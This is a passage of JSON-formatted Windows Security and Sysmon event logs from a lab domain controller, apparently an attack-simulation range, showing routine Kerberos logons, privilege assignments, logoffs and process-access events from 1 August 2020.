05:52:13.248","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4289,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.248\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.248","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220455,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":912,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x64FA3\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x64fa3","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220456,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":912,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x64FA3\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{AFF56F56-76BC-49CD-114E-CD569E1577C2}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t0\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x64fa3","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{AFF56F56-76BC-49CD-114E-CD569E1577C2}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"0","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220457,"ProcessID":864,"ThreadID":1544,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x64FED\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x64fed","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220458,"ProcessID":864,"ThreadID":1544,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x64FED\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{433511B1-83A7-FED9-9147-785D15F197B0}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t10.0.1.14\r\n\tSource Port:\t\t54931\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x64fed","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{433511B1-83A7-FED9-9147-785D15F197B0}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"10.0.1.14","IpPort":"54931","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4290,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.358\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B2-5F25-0000-0010EB030000}\r\nTargetProcessId: 4\r\nTargetImage: System\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\kerberos.DLL+96ea2|C:\\Windows\\system32\\kerberos.DLL+79354|C:\\Windows\\system32\\kerberos.DLL+13948|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+2c2c4|C:\\Windows\\system32\\lsasrv.dll+31819|C:\\Windows\\system32\\lsasrv.dll+2f177|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+16cdd|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1a96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.358","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B2-5F25-0000-0010EB030000}","TargetProcessId":"4","TargetImage":"System","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\kerberos.DLL+96ea2|C:\\Windows\\system32\\kerberos.DLL+79354|C:\\Windows\\system32\\kerberos.DLL+13948|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+2c2c4|C:\\Windows\\system32\\lsasrv.dll+31819|C:\\Windows\\system32\\lsasrv.dll+2f177|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+16cdd|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1a96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220459,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x65055\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x65055","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220460,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tDelegation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x65055\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{AFF56F56-76BC-49CD-114E-CD569E1577C2}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::3413:3332:6143:4f60\r\n\tSource Port:\t\t54933\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x65055","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{AFF56F56-76BC-49CD-114E-CD569E1577C2}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::3413:3332:6143:4f60","IpPort":"54933","ImpersonationLevel":"%%1840","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220461,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x64FED\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x64fed","LogonType":"3","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220462,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x64FA3\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x64fa3","LogonType":"3","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4291,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.358\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 